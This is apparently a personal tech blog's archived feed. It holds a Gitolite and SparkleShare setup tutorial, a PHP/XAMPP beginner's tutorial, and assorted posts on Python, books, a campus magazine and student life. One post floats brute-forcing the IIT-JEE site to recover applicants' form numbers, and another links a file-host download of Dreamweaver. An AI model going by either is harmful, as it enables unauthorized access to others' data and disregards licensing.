Enough description, let’s get down to some work:</p> <h3 id="setup-gitolite">Setup Gitolite</h3> <h4 id="assumptions-">Assumptions :</h4> <ol> <li>You are running a stable Linux OS (Fedora/Debian/Ubuntu etc)</li> <li><code class="language-plaintext highlighter-rouge">user@host1</code> is your own computer</li> <li><code class="language-plaintext highlighter-rouge">user2@host2</code> is the primary computer where you intend to start the server</li> <li>The gitolite username is <code class="language-plaintext highlighter-rouge">sparkle</code></li> </ol> <pre class="prettyprint lang-sh">
# On your own machine (user@host1), which will be the remote admin of the git share
ssh-copy-id user2@host2
# Should not ask for a password:
ssh user2@host2
sudo apt-get install gitolite
# Reconfigure the gitolite package installed above
sudo dpkg-reconfigure gitolite
# Configuration options may vary, but remember the gitolite user name that you specified
logout
# Come back to your own computer
git clone sparkle@host2:gitolite-admin
# Should work, or else you did something wrong. Go read the gitolite docs: http://sitaramc.github.com/gitolite/doc/
cd gitolite-admin
nano conf/gitolite.conf
</pre> <h3 id="setup-wildrepos">Setup WildRepos</h3> <p>Edit the file and add the following lines at the bottom:</p> <pre class="prettyprint lang-pl">
repo share/[a-z0-9]{6}
    C   = @all
    RW+ = CREATOR
</pre> <p>Now we need a method to allow anyone to create git repositories on the server.
This is accomplished via Gitolite’s very powerful Wildcard Repositories feature.</p> <pre class="prettyprint lang-sh">
# Log back in to the server
ssh user2@host2
# Since we are using the package install method, sparkle's password needs to be set
sudo passwd sparkle
su - sparkle
nano .gitolite.rc
# Search for $GL_WILDREPOS and set it to 1
logout   # leave the sparkle shell
logout   # leave host2 and return to your own computer
# Now we commit and push our admin repo to add the wildrepo settings
# You're still inside the gitolite-admin directory, right?
git commit -am "Enable wildcard share repos"
git push
</pre> <h3 id="setup-client">Setup Client</h3> <p>Now your server is all set up, but there is still stuff to be done:</p> <pre class="prettyprint lang-sh">
# On user@host1
mkdir -p ~/.ssh
sudo add-apt-repository ppa:warp10/sparkleshare
sudo apt-get update
sudo apt-get install sparkleshare libwebkit1.1-cil git-core
sparkleshare start &amp;
sparkleshare stop
</pre> <p>When you run sparkleshare for the first time, it asks you for a few things, including your email-id. Fill in those details, but do not set up your repository yet. You first need to allow your sparkleshare account access to gitolite.</p> <pre class="prettyprint lang-sh">
cd ~/.config/sparkleshare
ls
# Should reveal files called sparkleshare.email.key and sparkleshare.email.key.pub
cp sparkleshare.email.key.pub /path/to/gitolite-admin/keydir/
cd /path/to/gitolite-admin/
# The copied key is a new, untracked file, so it has to be added before committing
git add keydir/sparkleshare.email.key.pub
git commit -am "Added sparkleshare client1"
git push
</pre> <p>Now if all goes well, you’d have allowed access to gitolite for this user. We now need to re-run the sparkleshare setup. Find it in your Applications. Now when it asks you to fill in a repository path, type in the following details:</p> <pre class="prettyprint lang-yaml">
Server: sparkle@host2
Path: /share/fh73ah
</pre> <p>Please take care of the slashes, otherwise sparkleshare fails to recognize it as a valid ssh address. Instead of fh73ah, you can type any string of 6 lowercase letters and digits, which is what the wildcard pattern above accepts.
You can change this in your gitolite-admin conf.</p> <p>After your first sync is complete (in which it tries to clone your existing repo, and gitolite creates it for you), you can find a folder called Sparkleshare in your home directory. This contains all your personal sparkleshares, including your first one. Put any content inside the fh73ah folder and it will be synchronized automatically.</p> <h2 id="conclusion">Conclusion</h2> <p>The best thing about sparkleshare is that you can use your own server under your own rules. I’ve synced 143GB via Sparkleshare so far, and it has been working excellently. It keeps a complete history, takes care of moves (git) and allows you to keep huge backups easily. Just drag and drop, and forget. If you want to sync already existing folders, just drag them and alt+drop them inside the shared folder. This way a sym-link gets created, which refers to the original directory. The sparkleshare folder on my computer takes up hardly a few kbs, but syncs 150gb worth of data.</p> <p>This method is only useful if you need to manage multiple accounts on the same host. Otherwise, you can refer to this <a href="http://www.webupd8.org/2011/03/set-up-sparkleshare-with-your-own.html">excellent post</a> on webupd8 for instructions to install it to a single user system (which does not involve the complication of gitolite). I’ve been looking for some gitolite management scripts (I’ve written a few as well) which would allow one to easily add their own ssh keys. This way anyone can easily set up accounts on the system. However, as of now, this is just a dream.</p> New Website [ CaptNemo.in] 2011-06-13T00:00:00+00:00 https://captnemo.in/blog/2011/06/13/new-website-captnemo-in Just in case someone's still following this blog around (don't, it's already dead). &nbsp; I've moved over to my new website (<a title="CaptNemo.in" href="http://www.captnemo.in" target="_blank">http://www.captnemo.in</a>).
It's running from github and will be a perfectly static website where the power of my awesome magical skills shall finally be revealed. Just joking. It's hosted on the awesome servers of github and you might want to check it out. IIT-JEE 2011 Results 2011-06-01T00:00:00+00:00 https://captnemo.in/blog/2011/06/01/iit-jee <p>I worked out the entire IIT-JEE 2011 results and the end result is available <a href="/projects/iitjee">here</a>. I’ve intentionally removed the Application Form Number (partially) in the results, so that it may not be misused. I’m thinking of trying a full-scale birthday permutation attempt on the JEE site for the Application Form. What do you think? Will it be worth it?</p> Learning Python, PyGTK 2011-05-16T00:00:00+00:00 https://captnemo.in/blog/2011/05/16/learning-python <p>I had been meaning to learn either Python or Ruby for a long time but had been unable to decide. I had a basic understanding of both of these, but I never had the chance to build an entire application in either. And I’m not talking about using <a href="http://djangoproject.com" title="Django is a web framework for Python">Django</a> or <a href="http://rubyonrails.org" title="Ruby on Rails is a web framework for Ruby">Ruby on Rails</a> (which are both brilliant), but building a desktop application using GTK.
The application I was first aiming for was a P2P sharing client which would be completely decentralized and offer several special features, such as:</p> <ul> <li>NAT Traversal using <a href="http://en.wikipedia.org/wiki/UDP_hole_punching">UDP Hole Punching</a></li> <li>HTTP based file sharing as well (so that people can install their clients, and <strong>still use</strong> IDM for downloading stuff)</li> <li>Client discovery &amp; routing behind firewalls along the lines of Skype (<a href="http://www.h-online.com/security/features/How-Skype-Co-get-round-firewalls-747197.html">using supernodes</a>)</li> </ul> <p>However, my dreams were shattered by the first point itself, being the difficulty of NAT Traversal. Further ahead was the question of networking as well, which could have potentially driven me nuts. I worked a bit on it, using <a href="http://en.wikipedia.org/wiki/STUN" title="Stun is a NAT traversal server">STUN</a> and <a href="http://twistedmatrix.com" title="Twisted is a networking framework for Python">twisted</a>, but gave up on it soon as being unfeasible as a learning project.</p> <p>The next idea came to me when I got tired of downloading stuff using <a href="http://axel.alioth.debian.org/" title="Axel is a multithreaded download binary">axel</a> from the command line and started itching for something similar to <a href="http://internetdownloadmanager.com">Internet Download Manager</a> for Ubuntu. The closest thing to a download manager on Ubuntu is <a href="http://fatrat.dolezel.info/">FatRat</a> and is something I really don’t like. It is based on Qt and prides itself on working as a front-end for several file-sharing websites as well.
What I needed was in fact a fast download manager, which keeps track of what I download, and does not require keeping a terminal open all the time.</p> <p>I found <a href="http://projects.gnome.org/gwget/">GwGet</a>, which occasionally looks much better in the source version than in the one from the Ubuntu Repositories. I really liked this one, except for the fact that it was made using C++, and used single threaded downloads (like wget). As a result it was quite slow, and not up to my needs.</p> <p>That was when I thought of the idea of creating a download manager using GTK + Python/Ruby. I looked around for axel ports in Python/Ruby and found <a href="http://code.google.com/p/pyaxel/" title="Axel port to python">PyAxel</a>, which beat axel in some of my benchmarks (after <a href="http://code.google.com/p/pyaxel/issues/detail?id=4" title="My patch for optimizing PyAxel's chunk size">this patch</a>). For the past two days, I have been working on PyGTK, Glade, Anjuta and several other IDEs, none of them to my liking. I really prefer Vim :)</p> <p>So far, the work on <a href="https://github.com/captn3m0/pget" title="PGet home page on Github">PGet</a> has been minimal. I’ve worked out threading, and little parts of GUI which were stripped from GwGet. As of now, it is still in the works, but I am hoping for a release real soon. After all, it is not for nothing that they call Python a dynamic language.</p> <p>For more details, please go to the <a href="https://github.com/captn3m0/pget" title="PGet home page on Github">PGet</a> project page on Github. I will be posting further updates over there.
In case someone is following this blog, you can view the source for this website at <a href="https://github.com/captn3m0/captn3m0.github.com" title="This website on GitHub">github</a> and maybe even fork it!</p> Puzzles, Life & Other Things 2011-04-30T00:00:00+00:00 https://captnemo.in/blog/2011/04/30/puzzles <p>Since I’ve already decided to make this my newer blog, why not just continue in the same spirit and write a little of the events of my highly boring, lazy life. For one, I was part of the SDSLabs 1st yearly trip to Robber’s Caves which was highly enthralling. We enjoyed a lot, and as a bonus I learned to play Mafia. Somehow the concept of not-knowing and yet trying to deduce out a solution in Mafia seems quite interesting for a Party game to me. Among other things, my sister got me a new Rubik Cube (which should be my 6th or 7th I guess), and I’ve been practising quite a lot (to the dismay of my friends and teachers), My timings have not been upto the mark as they were last year, but I’ve been improving and I average around 80 seconds per solve. I’ve been focusing on learning the entire Fridrich, and try to learn 2-3 moves per day.</p> <p>I also spent some time reading a brilliant new fantasy series called “The Kingkiller Chronicles” by Patrick Rothfuss. It is a brilliant new debut series in fantasy fiction, and already has 2 books out from its planned trilogy : The name of the Wind, and The Wise Man’s Fear. The series is highly praised, and you were to believe me, one of the best pieces of Fantasy ever written. But it is not the fantasy about this book that makes it so great. Its the general themes of love, tragedy, enemity, and knowledge that make it brilliant. Kvothe, the protagonist of the series is a charming character who is telling the story of his life to the Chronicler. Enough on the book, just go ahead and read it!</p> <p>Oh, and I’ve got a RSS feed for blog using Jekyll already. 
It’s available <a href="/atom.xml">here</a>.</p> Game Of Thrones 2011-04-19T00:00:00+00:00 https://captnemo.in/blog/2011/04/19/game-of-thrones <p>For the uninitiated, Game Of Thrones is a high budget fantasy TV series currently being screened on HBO. It is based on George R.R Martin’s epic fantasy, A Song Of Fire &amp; Ice, book one of the Game Of Thrones series. I had started reading the book a few weeks ago (not knowing then about the TV series), but never quite got the time. However after the highly promoted Trailer, and the absolutely brilliant episode 1, I’ve picked up the book once again.</p> <p>I’ve decided to keep myself aloof from all the spoilers, and read the book along with the series. This means that I will be finishing the book in a very long time, but also that I will be able to get a much better insight into what is going on in the series. For example, there are very many characters in the TV series, which are not yet introduced, and it was interesting to see them come upfront in the book.</p> <p>Is anyone else reading the book for the first time along with the TV series?</p> <p>Below is the ground from the book that each episode contains. I will continue to update this as the series goes ahead:</p> <p>Episode:</p> <ol> <li>Chapters 1-8</li> <li>Chapters 9-17</li> <li>Chapters 18-24*</li> <li>Chapters 25-29</li> <li>Chapters 30-35</li> </ol> <p>* Only half of the chapter is present in the respective episode.</p> <p>Let me know what you think of Game Of Thrones in the comments…</p> Introduction 2011-04-10T00:00:00+00:00 https://captnemo.in/blog/2011/04/10/introduction <p>Welcome to my github pages. This will be my personal code blog site, or something of that sort. I will soon be transitioning this site to Jekyll for easier publishing and maybe move away from wordpress. 
(Done)</p> <p>I am a proficient coder in PHP, working on various internal projects at SDSLabs.</p> <p>Here is my current setup :</p> <ul> <li>Dell Inspiron 1545</li> <li>T-6400 Intel Core 2 Duo</li> <li>Ubuntu Oneric Ocelot 11.10 (Default Primary OS)</li> <li><del><a href="http://elementaryos.org">Elementary OS</a> (Under Testing)</del> Will be moving to Gnome Shell soon</li> <li><del><a href="http://samurai.inguardians.org">Samurai WTF</a>, <a href="http://backtrack-linux.org">Backtrack 5</a></del> for pen-tests</li> <li>Moved from Windows after remaining a staunch supporter for 5 years</li> </ul> How to run apt-add-repository behind firewalls (#iitr) 2011-04-01T00:00:00+00:00 https://captnemo.in/blog/2011/04/01/run-apt-add-repo-behind-firewall <p>Copied from <a href="http://www.omgubuntu.co.uk/2011/01/how-to-add-repositories-to-ubuntu-from-behind-a-firewall/">OMGUbuntu</a></p> <ol> <li>Press Alt-F2 and type “gksu gedit /usr/lib/python2.6/dist-packages/softwareproperties/ppa.py”</li> <li>Find line 88, change “keyserver.ubuntu.com” to “hkp://keyserver.ubuntu.com:80”</li> <li>Save and close</li> </ol> <p>Note that this is the default setting in Ubuntu Natty Narwhal (11.04), and was only applicable for Maverick or older versions.</p> Wona Oct-Dec '10 Review 2011-03-17T00:00:00+00:00 https://captnemo.in/blog/2011/03/17/wona-review <p>Download the issue on the WONA <a href="/wona/">archive website</a>.</p> <p><a href="/wona/"><img src="https://captnemo.in/wona/2010-12.jpg" alt="Wona December Issue" title="Wona December Issue" /></a></p> <p><strong>Note about Archival</strong>: <em>This post used to live on the (now-dead) piratecoders.co.cc website. I’ve moved it here for archival’s sake.</em></p> <p>The latest issue of WONA turned up 3 months late at my doorstep. Other than the fact that it was missing an apology letter for this lateness, it was a good step in the forward direction by WONA in general. 
Once you take aside the pleasantries, and the sarcasm, I felt that WONA was, on a general scale, surpassing what it had been doing till now, and moving towards a better (and hopefully a quicker) issue. However, this one was definately not the one to be labelled perfect. So here comes the review :</p> <p><strong>Cover :</strong> Let’s start with the cover. Not much to write about it, other than the fact that it took me quite some time to figure out what was Maradone doing on it. Nice work in putting up the WONA logo (which I’m genuinely fond of). Nice choice of color scheme, and over-all good work.</p> <p><strong>Editorial :</strong> The magazine starts at a good note with the editorial promising us what’s inside in a nutshell. This was the best write-up of issue for me, and did its job well. I was enticed into reading further, and got a gist of what was about to come.</p> <p><strong>Almost Famous :</strong> Almost Famous has quite a history of its own, and is one column that every person who lays his hands on WONA definately reads. This time around, you held out Jan Flaming for me. As for the interview itself, it was clearly written, had some nice questions, some imaginary answers, and overall does quite well for the reader. On a second take, this was probably the reason it ends up on the first page this time.</p> <p><strong>Murphy’s Strip :</strong> Alas if Murphy had been here, he might have taken a shot or two at you. How about : “Any comic that can go wrong <em>will</em> go wrong.” Or maybe “If Vela could draw stupid sketches, he would.” Still, nice concept, bad execution. Could have been better, definately, especially with regards to sketching. Still 42 times better than the other strip.</p> <p><strong>NewsNotes :</strong> were 4 pages of news, which arrived 3 months too late. Nobody remembers any of these incidences happening, let alone being part of them. PAN-IIT was way bigger than your coverage, and deserved a bit more. 
Rest all the newsnotes were in a bit, exactly what they were supposed to be : News, without any sarcasm or humour. However I’m heavily against the use of one and half pages to glorify pages. I know how costly it is to push each page into the magazine, but please don’t fill it with something that no one bothers to read. Medal winners, please don’t mind but the two tables were a waste of space, if not something else. Or else the nine people from WONA’s news section could not find enough news. Anyone could have gotten these lists from the Sports Council a day after the event ceremonies. Give me something better.</p> <p><strong>Face-Off :</strong> was usual stuff. Nice choice of topic, nicely edited, with some actual points being thrown around, this turned out fine.</p> <p><strong>Big Story (Devil Wears Prada) :</strong> In spite of my initial skeptism about the story (I knew about it before the issue came out), I really liked it. This article goes ahead and proves that what you write on is unimportant (or at least less so) as long as you write it well. In a world of geeks, bringing out a cover story on fashion is really a bold move, and I must applaud you for having the guts to do so. The article was well written, and a joy to read. However I’d come to hear, from several sources, that people quoted in the article did not in fact give one to WONA. Please take care not to make up stuff next time. You’re a news mag, stick to the status quo, please.</p> <p><strong>Verbatim :</strong> WONA gets its hands on the most respected professor on on our campus, and does quite a good job of it as well. Nice questions, interesting answers make up a good read. In fact, the only negative point of the article was its placement.</p> <p><strong>WonaLeaks :</strong> This was the article that forced me to write this review. If it was an attempt at humour, it failed badly. As an attempt to mix news and wonaspeek, it fails even badly. 
Mixing kangaroos, indian cricket team, koala bears and a state prosecutor is definately not the recipe for sucess. It might work in movies (Spaceman + Potato Head + Zombie Dolls + Cowboy + Alien with 3 eyes = Oscar), but definately not on paper. Nobody remembers the event the article talks about. Its relation to wikileaks is not enough to demand a WonaLeaks icon. I shall forever remember this as the worst of writing, and imagination that ever came out of wona.</p> <p><strong>Tech-ila Shots :</strong> The in house tech article arrives a few months late. (Google just released Cr-48). I would have personally liked to see something else here (iPhone vs Android, iPhone 5, Ubuntu vs Windows etc). But as it was, the article was well thought of, and did exactly what it planned to. It could have done with a bit of pruning though, and the author might have liked to tell us a bit more about the OS itself (it only mentions the fact that its web based, comes as pre-installed, will not run intensive applications).</p> <p><strong>Random Ed :</strong> I’m not sure if it really is an editorial, but I’ll stick with the title. Nicely written in short. However the purpose and intent of such an article is lost in the true random nature of the article itself. The article fails to reach a resolution, and delievers nothing at all. Indeed most of the thoughts mentioned in the article, must have sprung to every person’s brain at some time or another. Then what’s the need of this article? Is it philosophy that Wona’s trying to dive into? Or perhaps its just a conspiracy to get all students in the campus to think more randomly, leading to a decrease in entropy of the thoughts of the profs, and as a consequence, simpler question papers. (For the skeptics, something similar has already happened, and our thought patterns <em>are</em> involed in the entropy of a system.)</p> <p><strong>Ethics :</strong> was actually the cover story (which one comes to know only after re-reading the cover). 
The author is unclear of the intent of the article, and it steers in various directions. I’m still unsure as to where it ends, and whether Arasu’s mumblings (Another Brick in the Wall) are part of it. One might raise question as to the relevance of the last section itself, but this article had its moments as well. In short, nice concept, nice writing, but could have done with a bit of restructuring.</p> <p><strong>Canine Strip :</strong> Another page wasted. The time spent by the sketcher could so easily have been devoted on bettering the other one. Needless to say, wona seems to be lacking in people who actually write, and the it results in a page filled with a stupid comic about dogs taking over the campus. Seriously, get some creativity. Even zombies would have done better.</p> <p><strong>WORC :</strong> Good decision in continuing this column. I was afraid it might get scrapped along with Agony Aunt(which was a very good decision). I can just hope that you actually asked some persons to create those pie charts. Dr. Sinhval seems to have taken his time in answering the questions, and his reply is full of facts, explanations, and ideas. Nice work by the ed team here, definitely.</p> <p>Other than the articles there are a few more areas of interest I would like to point out.</p> <p><strong>Design:</strong> Seriously, have you people ever heard of vector graphics. Your designers really need a course on making scalable graphics. The need for Darth Vader to illustrate an article is fine, as long as you have a big enough image to fit. Trying to scale a 400×300 jpg into a page will not do. Even the cafe de norma ad was pixellated. The girl wearing Prada proves that it was possible to pring clearer graphics . However on the very next page, there’s an overdose of black. Similarly pixellated were most of the other pics on the mag. The 3 monkeys illustrating the second last page could have been something better. 
The essence of the German flag was lost in black &amp; white(Almost Famous) . And just so you know that everyone noticed , dark colored pics in the background make text unreadable (Chrome OS).</p> <p><strong>Ads :</strong> I don’t know the reasons behind it, but from a reader’s point of view, an issue with only 3 ads is really awesome. Especially once you compare it with Kshitiz’s latest issue. I know it must have been really hard to cover the costs, and manage the finances and all that. But folks over here are smiling for your hard work. You finally published it (albeit 3 months late), and that’s what matters.</p> <p><strong>Placement :</strong> could have been better. Some articles should have gotton more coverage than given. Perhaps you should think of making Tech-ila bigger. I would’nt have minded the least if Verbatim had gotten a bit larger. The ethics article was divided into portions, I couldn’t understand, and might have done with fewer sections.</p> <p><strong>Cover :</strong> A little side note as to why the article change from the cover to the article itself. Isn’t the cover supposed to hold titles as well. On second thoughts, I might be wrong to suggest your current layout, but can you just put up page numbers! They would surely help.</p> <p>And finally a note from my side : Wona is an excellent magazine. Despite it having a status quo of its own on its supposed unreadability without an excellent understanding of wona’s inner sanctum, I believe that the magazine is an essential part of life at iitr. It is one of the few sections in our campus, whose work is actually a part of our daily life. Thanks to the entire team for working so hard on this issue.</p> <p>This review is my way of letting you know that there are people who care about what you write. There are people who wait for the issue, and who are determined to do so till they pass out. Consider it a friendly nudge and a little feedback from my side. 
Its up to you decide what your mag is after all. With hopes that the next issue is even better than this one</p> <p><em><strong>Update</strong>:</em> Friends over at wona inform me that the delay in the mag was due to an issue on the administration’s side rather than wona’s side. If that was the case, the blame’s partially on your staff advisors (spelled incorrectly in the mag’s first page) : Dr. M.J. Nigam, and Dr. B.R.Gurjar. I’m still not sympathatic to the excuse given entirely, and believe that it might have come out a bit more sooner with some more effort on wona’s side.</p> Random Stray Thoughts 2010-05-25T00:00:00+00:00 https://captnemo.in/blog/2010/05/25/what-the-hell-is-this <p>[Editor’s note: I found this scrawled across a a4 sheet in a classroom. The author drifts off way too much from his thinking to make any sense, but there were some things that I really liked. So I present them to you, unedited, random, and unexplainable thoughts of a genius. My comments are in brackets]</p> <p>Sometimes you are just destined to be where you are. You may try to veer off course, try to change it. But the end remains the same.</p> <p>You.Here.Now</p> <p>The forces of Destiny seem too powerful to be stopped by you. So you keep on flowing. Further &amp; further away.</p> <p>And time moves on And its Now already.</p> <p>Looking back at the choices you made, the crossroads you stood. The coincidences, accidents pile up and as you remember them you think - would you have chosen otherwise?</p> <p>But regardless of your answer you’d still be here, Now.</p> <p>And its only left to deal with the Now.</p> <p>[Note: Now the author takes a swipe at history. lol]</p> <p>Ever since mankind learned to reason, the challenge had always been to tackle the Now. 
For tomorrow was forever being planned, partly in our own dreams, and partly in the garden of Destiny</p> <p>As of the Past, it was just a multitude of feelings, a vault to choose from - Happy, sad, heartbreaking, exciting memories, remembrances, last words. The Past always walks besides us - sometimes haunting, crippling us down, and at times uplifting, encouraging, &amp; maybe even expecting.</p> <p>And so the challenge remains the the Now. What do you do with it? Go ahead and battle it head on - as you’ve been asked to, regardless of the consequences?</p> <p>For herein lies the path to greatness, the say - Keep Fighting. But is it the only path?</p> <p>[Note: Here on the author seems to get drifted far too much in his own thoughts, and does not care to explain very much. As a result much of the following is pretty self contradictory, and maybe even rubbish]</p> <p>What if there is another road. A road much less taken as Frost said. A road you know nothing about.</p> <p>What if the present is not a choice? What if it is just a sequence of events to be played out from someone’s memories, where you just play your part, and in-spite of what road you choose, you end up where you must.</p> <p>So you fight. And think. And fight with the Present [As if the present is a monster, you fool], believing that the Future can be changed, it can be manipulated, morphed into someone’s likeness.</p> <p>Your head starts to pound with the effort. You decide to stop thinking. [Ahh. Finally, I was wondering how long I would have to keep up]</p> <p>Its clearing your head. Then you look around you. [Reality, anyone?] The Present closes in [Not again!!] You realize its not there to be defeated, or to win either. It just is. Just as you are. 
And you close your eyes again.</p> <p>You start to think.</p> <p>[I like the ending]</p> Worries Css Template 2010-04-15T00:00:00+00:00 https://captnemo.in/blog/2010/04/15/worries-css-template Finally, from being a complete programmer to a designer as well, who can create a css template using Paint.Net. Photoshop is way too outlandish for me, you see. It wasn't easy, but it was definitely fun. The template was based on a wallpaper by http://leon-gao.deviantart.com. The final template is still unnamed. Hope you all like it, and there is a demo available at http://nemo.criitique.in/worries. <a href="http://captn3m0.files.wordpress.com/2010/04/simple2.png"><img src="http://captn3m0.files.wordpress.com/2010/04/simple2.png?w=300" alt="Template" title="Worries Template" width="300" height="208" class="size-medium wp-image-55" /></a> What's Sailing 2010-03-23T00:00:00+00:00 https://captnemo.in/blog/2010/03/23/whats-sailing <p><strong>Aboard The Nautilus, that is</strong></p> <p>I finally decided to write a blog post for my non geek friends with affiliations ranging from DPs to BPs and the oblivious to all, but the elite few, GPs (Keep thinking, non_IITians). In midst of all the chapos, and ghissai (not me, of course), Nautilus has been, and will remain a lonely submarine beneath the ocean. And this has been the way for me in the past month. After a hefty piece of time where we were attacked by the mighty INS Cognizance (actually it was a retaliation attack, because you see, Nautilus had won an event of theirs, a treasure hunt, and the mighty Cognizance, and the event organizers deemed the methods of my winning to be dishonest. I had my reasons.) But after that a hefty war at the seas resumed. I had the luxury to dip underneath and avoid everything, once in a while. But rumours surrounded me, and I started to hear all sorts of things about me. 
And that is when the drama settled once and for all.(It ended with a 5k fine, if you need to know).</p> <p>INS Cognizance is on its way for the end of its journey(Join it @ www.cognizance.org.in and 26-30 Mar, IITR). However I shall be busy participating somewhere else, Chaos ‘10, India’s largest gaming extravaganza. I have assured INS Cognizance that Nautilus shall no longer be troubling them, but who knows with such waters, a collision may be unavoidable in the near future. And when that happens, I’m taking my warheads with me, just in case.</p> <p>In other news, I have been working on a couple of my own ideas, such as SMAC-I (Search Music Across Channel I), a Video Portal for Cinematography Section, IITRAANA.org, Counter Strike servers, the Intra Bhawan Gaming Tourney (which we won easily enough in AoE, NFS, as well as CS). Congrats to my clan mates. The net connectivity has been terrible here, and I’ve been derailed a few times along my route to Gmail.  Among other news, Oh, and I won the second prize in srishti’s dynamic website design, for LION- my twitter clone. I may or may not launch it, because you see, its just another clone. I also put up a new design for Criitique.in. Please check it out, and comment. I also posted a lot of pics and designs in Kriti , the DeviantArt clone for IITR. Check them as well.</p> <p>For those outside IITR, the link for my web presence is http://nemo.criitique.in.</p> <p>Here are some final few words in parting to all my frnds @ IITR</p> <p>@[Ex!$TeN$n3] - gl hf, gg :)<br /> @LxG - 14,11<br /> @alpha_Q - Better Luck Next Time<br /> @17ninJa - Practice For Chaos<br /> @bOb - fnatic lost to na’vi 2-0 (16-14, 16-13 in train, infy !)<br /> @roomie - [insert silence here]<br /> @xerxes,forsaken - nice team<br /> @DArK_LOrD - i expected better<br /> @Dead_Man - Welcome to LxG<br /> @ll those I frGT - [Proxy laga dena plz]</p> <p>And special thanks to DR. Lecter, General Hendrix for making the legend of Capt. Nemo a reality. 
If you ever need assistance in a cross atlantic trip, let me know. I may ship you till atlantis, after which you are responsible for yourself and your belongings :)</p> Learning PHP/mySQL Part 1 2010-02-20T00:00:00+00:00 https://captnemo.in/blog/2010/02/20/learning-phpmysql-part-1 <p>Over the past 2 months, I’ve been learning PHP/mySQL as a great language. After helping out a lot of people, I’ve decided to write a tutorial on using PHP/mySQL to create a cool website. For the entire duration of this tutorial, this is the list of software we will be working with:</p> <blockquote> <p><a href="http://www.google.com/search?btnI=I'm Feeling Lucky&amp;q=XAMPP Server Lite version">XAMPP Server Lite version</a> (to get apache &amp; mySQL)<br /> <a href="http://www.mediafire.com/?4eemynbynjw" target="_blank">Dreamweaver CS4</a> (For Template Support). Alternatively use <a href="http://www.google.com/search?btnI=I'm Feeling Lucky&amp;q=Microsoft Expression Web 3">Microsoft Expression Web 3</a>.<br /> <a href="http://www.google.com/search?btnI=I'm Feeling Lucky&amp;q=Notepad++">Notepad++</a> (It’s a cool editor)<br /> <a href="http://www.google.com/search?btnI=I'm Feeling Lucky&amp;q=PHP Manual">PHP Manual</a> (download the full html version)</p> </blockquote> <p>The website we will be developing is called Artemis Fowl Files (AFF for short). It is a small website with several features that we shall develop over the length of the tutorial.</p> <h2 id="installing-php--mysql-using-xampp">Installing PHP &amp; mySQL using XAMPP</h2> <p>PHP is a server-side scripting language, which means that PHP code is run on the web server itself. For example, any PHP script running at Google.com will remain on the server, and not reach you (the client). By contrast, JavaScript runs on the client side, i.e. 
any JS code must be transmitted to the client before being executed.</p> <p>This is how a basic PHP script actually runs:</p> <blockquote> <p>PHP source file -&gt; PHP parser (running on the web server) -&gt; becomes an HTML file -&gt; HTML file sent to client</p> </blockquote> <p>This means that the PHP source file is run on the server, which converts the file to a pre-calculated HTML file, which is then sent to the client. Let’s write some basic PHP code.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;HTML&gt;
&lt;HEAD&gt;&lt;TITLE&gt;Sample PHP File&lt;/TITLE&gt;&lt;/HEAD&gt;
&lt;BODY&gt;
&lt;?php
// Runs on the server; only the echoed string reaches the client
echo "This is a sample PHP File";
?&gt;
&lt;/BODY&gt;
&lt;/HTML&gt;
</code></pre></div></div> <p>The basic rule of PHP is that the only code considered PHP is the code between the &lt;?php and ?&gt; tags. Anything outside these is left untouched and remains the same (i.e. it is not run on the server). The echo command writes the text string into the HTML output. All this means that the file received by the client will look like this:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Sample PHP File&lt;/TITLE&gt;&lt;/HEAD&gt;
&lt;BODY&gt;
This is a sample PHP File
&lt;/BODY&gt;
&lt;/HTML&gt;
</code></pre></div></div> <p>This is what you will get if you run the script on a test server. But before doing that we must install XAMPP, and do some basic setup stuff.</p> <p>Download and extract XAMPPlite.exe anywhere on your computer. Go to where you installed it and run setup_xampp.bat. This will automatically start the Apache server and the mySQL server by default. Also try tinkering with XAMPP-Control and see what runs it.</p> <p>Now open your web browser (Firefox/Chrome is preferred) and open <a href="http://127.0.0.1">http://127.0.0.1</a>. 
This IP address is a loopback IP address and always refers to this computer itself (yours). Now you should see a XAMPP splash screen. Go ahead and explore. As of now, what you’ve achieved is this: installed Apache and the mySQL server. Now we need to change the settings for mySQL. Open <a href="http://127.0.0.1/security/xamppsecurity.php">http://127.0.0.1/security/xamppsecurity.php</a> and change the mySQL root password (it’s blank by default). Also set a password on the xampp directory, so that others can’t access these settings. Remember the mySQL root password, for it will be useful later on.</p> <p>Now comes the part where we actually sit down to write some code. We will be developing the mySQL parts in the next segment. However, we still need to do some other little things before we reach that part.</p> <h2 id="creating-the-dreamweaver-template">Creating The Dreamweaver Template</h2> <p>Now, call me lazy, but I don’t like designing themes and CSS for my websites. I usually use a free one. And for the rest of this tutorial, I assume you will do the same. We need to create a Dreamweaver website using a readymade CSS template. To get a template, head on to <a href="http://www.freecsstemplates.org">http://www.freecsstemplates.org</a>. I chose <a href="http://www.freecsstemplates.org/preview/reckoning" target="_blank">this</a> template. Feel free to choose anything. It does not really matter which, but take care not to download a three column template, because what we will be developing is quite basic.</p> <p>Create a directory called artemis inside the htdocs folder (found inside xampp). Extract the CSS template files to the artemis folder such that the index.html file is inside xampp\htdocs\artemis. Now head to your browser and open <a href="http://127.0.0.1/artemis">http://127.0.0.1/artemis</a>.</p> <p>If all went well, you should now see the template theme. Now we must convert this CSS template into a Dreamweaver template. Open the index.html file in Dreamweaver. 
We have to mark certain areas that we intend to edit in each document as editable. For instance, the top header in each document must remain the same and would not be editable. But the sidebar content may need to change as per each page on our site. Taking this further, the footer will be the same for each page. To create an editable region, just select a sample text from the main text (the one that looks like the blog entry) and right click -&gt; Templates -&gt; Create Editable Region.</p> <p>Dreamweaver will give a warning that the current document will be converted to a template. That is what we want. Give a name to the region (let’s call it ‘main’). Now delete everything other than this main region from the right column (i.e. the blog entry column). You may need to switch to the split view to cleanly delete the HTML markup.</p> <p>Similarly create another editable region for the sidebar. Remember to delete everything else in the sidebar as well. Now there is something to Dreamweaver which requires you to create a “site” before you can create a template. So go to the Site menu and click on New Site. Choose a site name (Artemis) and enter the correct web address where you can access index.html (<a href="http://127.0.0.1/artemis">http://127.0.0.1/artemis</a> or <a href="http://localhost/artemis">http://localhost/artemis</a>). Tell Dreamweaver that you want to use a server technology (PHP mySQL). Choose edit and test locally (because we don’t yet have access to an external web server).</p> <p>Once you’ve created a site, you can save the web template (Ctrl+S). Currently no templates exist in our web site, so we will create one and call it “main template”. If Dreamweaver asks you to update links, press yes.</p> <p>Now we will create our basic home page using this template. Press Ctrl+N to create a new page. On the left choose “Page from Template”, choose the site as 